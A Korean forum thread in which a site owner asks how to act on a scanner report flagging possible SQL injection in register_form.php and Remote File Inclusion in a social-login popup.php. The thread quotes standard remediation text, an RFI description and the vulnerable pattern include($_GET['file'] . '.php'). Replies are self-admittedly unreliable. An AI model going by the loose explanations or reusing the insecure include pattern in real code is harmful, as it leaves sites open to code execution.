register_form.php에서 agree, agree2
본문
서버 보안에 대해서는 아는 바가 없어 질문드립니다.
스마일서버를 사용하고 있는데, 그곳에 취약점 점검이라는 기능이 있습니다. 해당 기능을 실행하고 보고서를 받았는데 아래와 같은 2가지 내용이 있습니다. 보안을 위해 취해야할 내용이 무엇인가요?
1)
SQL injection may be possible
/bbs/register_form.php param agree, agree2
Solution
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
2)
Remote File Inclusion
/plugin/social/popup.php?provider=google&url=http%xxxFwww.google.com%xxxFsearch%xxxDOWASP%xxxAP param url
Solution
Phase: Architecture and Design
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.
Phases: Architecture and Design; Operation
Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
Be careful to avoid CWE-243 and other weaknesses related to jails.
For PHP, the interpreter offers restrictions such as open basedir or safe mode which can make it more difficult for an attacker to escape out of the application. Also consider Suhosin, a hardened PHP extension, which includes various options that disable some of the more dangerous PHP features.
Phase: Implementation
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
For filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.
Phases: Architecture and Design; Operation
Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.
This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce your attack surface.
Phases: Architecture and Design; Implementation
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.
답변 3
구글번역 도움을 받아~ 보니까
해결책 내용였네요
내가 달 댓글은 아닌가보다 생각들었는데 그냥 심심해서 개인적은 의견 달아봄
요점은
1. /bbs/register_form.php 이거 문제
2. /plugin/social/popup.php 요거 문제인거 같음
요기서 1번은 악의적인 파일첨부 할수있다고 하는거 같음
2번은 추측하기 힘든데..
ID 1은 "inbox.txt"에 매핑되고 ID 2는 "profile.txt"에 매핑될 수 있습니다 (어떤기능이 있길래~ 저도궁금)
php 기능을 무력화 할수 있음.
- 블랙리스트에 의존하지말라는내용~
- 문서 외부 라이브러리 상수 를 외부 사람이 건들지 못하게 하는거 같음
- 뭐가 어땠든 그 안에 들어간 애플리케시션이나 API 호출을 통해 간적적으로 너를 좆되게 할수 있다는걸 기억해주세요 하는거 같음
(꼼꼼히 읽고 한거 아녀서 오류 많아요 그냥 짧게 흘터본 느낌으로 이해 해주심 ~ 3시간 고민할 순없잖아요 수당나오는것도 아닌데
실력있는 개발자가 아니고 노력하는 사람이라~ 믿으시면 안되고
주사인거 같아 이만~
2( 구글 소셜로그인쪽은 아래 내용이 더 있어 첨부합니다.
Description
Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code.
Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code into separate files that are later referenced by main application modules. When a web application references an include file, the code in this file may be executed implicitly or explicitly by calling specific procedures. If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.
An attacker can use RFI for:
* Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.
* Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, JavaScript to steal the client session cookies).
PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming and due to default server configurations that increase susceptibility to an RFI attack.
"dynamic file include"
예를 들자면 include('header.php'); 이런거 문제 인거 같아요 (저도 궁금하네요)
동적 인클루드 include($_GET['file'] . '.php');